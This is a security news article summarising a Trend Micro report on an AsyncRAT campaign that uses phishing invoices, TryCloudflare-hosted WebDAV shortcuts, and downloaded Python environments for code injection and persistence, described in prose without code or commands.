AsyncRAT Campaign Abuses Cloudflare Free Tier and Python Environments for Stealthy Deployment
Trend Micro researchers detail a multi-stage AsyncRAT campaign exploiting Cloudflare's free-tier infrastructure and legitimate Python environments to evade detection.
Trend Micro researchers have analyzed a multi-stage AsyncRAT campaign that leverages Cloudflare's free-tier services and legitimate Python environments to deploy the remote access trojan. The attack chain, detailed in a January 12, 2026 report, demonstrates advanced evasion techniques that abuse trusted cloud infrastructure to bypass traditional security solutions.
The campaign begins with phishing emails containing Dropbox links to a ZIP archive named "Rechnung zu Auftrag W19248960825.pdf.zip" (German for "Invoice for Order"). The archive contains an Internet Shortcut file (.url) that points to a WebDAV resource hosted on TryCloudflare domains, which are part of Cloudflare's free-tier service. This abuse of Cloudflare's infrastructure masks malicious activity under legitimate domains, making detection challenging.
Once the shortcut is executed, it downloads a Windows Script Host file (as.wsh) that initiates a multi-stage infection chain. The attack uses legitimate Python downloads from official sources to establish a complete Python environment on the victim's system. This environment is then used to execute sophisticated code injection techniques targeting explorer.exe processes, ultimately delivering the AsyncRAT payload.
The malware ensures persistence through multiple vectors, including startup folder scripts (ahke.bat, olsm.bat), WebDAV mounting, and legitimate "living-off-the-land" techniques using Windows Script Host, PowerShell, and built-in system utilities. These methods help the malware evade detection by blending in with normal system operations.
Trend Micro's Managed Detection and Response (MDR) team observed consistent file naming patterns across cases, with "Rechnung" followed by additional characters. The attack chain was correlated using Trend Vision One, which detected and blocked the indicators of compromise (IOCs) outlined in the report. The final payload, identified as AsyncRAT, provides attackers with keylogging, screen capturing, and remote command execution capabilities.
This campaign highlights the evolving tactics of threat actors who increasingly abuse trusted cloud services and legitimate software environments to deliver malware. The use of Cloudflare's free-tier infrastructure and Python environments represents a significant shift in evasion techniques, making it imperative for organizations to adopt advanced detection and response capabilities.